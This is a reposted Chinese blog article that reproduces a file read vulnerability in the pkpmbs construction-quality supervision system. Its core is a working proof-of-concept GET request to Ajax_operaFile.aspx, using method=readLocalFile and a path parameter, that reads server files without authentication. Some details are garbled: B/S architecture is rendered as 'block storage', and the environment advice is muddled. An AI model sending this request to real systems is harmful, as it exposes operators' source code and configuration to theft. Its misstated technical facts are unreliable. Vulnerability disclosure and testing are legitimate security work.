博客
关于我
pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx 文件读取漏洞复现
阅读量:794 次
发布时间:2023-03-02

本文共 495 字,大约阅读时间需要 1 分钟。

产品简介

pkpmbs 建设工程质量监督系统是湖南建研信息技术股份开发的基于块状存储(B/S)架构的检测信息管理系统,专为工程质量检测管理与信息监管场景设计。该系统通过集成先进的信息监管技术,实现对工程质量数据的全流程管理与监督。

漏洞概述

在系统的 Ajax_operaFile.aspx 接口中,存在文件读取漏洞。该漏洞未经身份认证的攻击者可利用,通过传递特定请求参数,绕过文件路径验证机制,读取系统内部配置文件或源码,导致信息泄露,严重影响系统安全。

复现环境

为复现此漏洞,需在符合系统要求的环境中进行测试。建议使用支持 modernIE 插件的浏览器(如 IE 11 或类似工具)搭配对应版本的系统软件。

漏洞复现

通过以下 PoC 验证:

GET /Applications/BaseInfos/System/Ajax_operaFile.aspx?method=readLocalFile&path=/Applications/BaseInfos/System/Ajax_operaFile.aspx HTTP/1.1

上述请求会触发漏洞,允许攻击者读取指定路径下的文件内容。

转载地址:http://xetfk.baihongyu.com/

你可能感兴趣的文章
pip throws TypeError: parse() got an unexpected keyword argument ‘transport_encoding‘ 在尝试安装新软件包时
查看>>
pip 下载慢
查看>>
pip 升级报错AttributeError: ‘NoneType’ object has no attribute ‘bytes’
查看>>
pip 安装opencv-python卡死
查看>>
pip 安装出现异常
查看>>
Pip 安装失败:需要 SSL
查看>>
Pip 安装挂起
查看>>
pip 或 pip3 为 Python 3 安装包?
查看>>
pip 文件损坏导致 pip无法使用 报错 ImportError: cannot import name 'main' from 'pip._int
查看>>
pip 无法从 requirements.txt 安装软件包
查看>>
pip/pip3更换国内源
查看>>
pip3 install PyQt5 --user 失败
查看>>
pip3命令全解析:Python3包管理工具的详细使用指南
查看>>
pip3安装命令重复创建文件‘/tmp/pip-install-xxxxx/package‘失败
查看>>
PIPE 接口信号列表
查看>>
pipeline配置与管理Job企业级实战
查看>>
pipeline项目配置实战
查看>>
Pipenv 与 Conda?
查看>>
QVGA/HVGA/WVGA/FWVGA分辨率屏含义及大小//Android虚拟机分辨率
查看>>
pipreqs : 无法将“pipreqs”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写,如果包括路径,请确保路径 正确,然后再试一次。
查看>>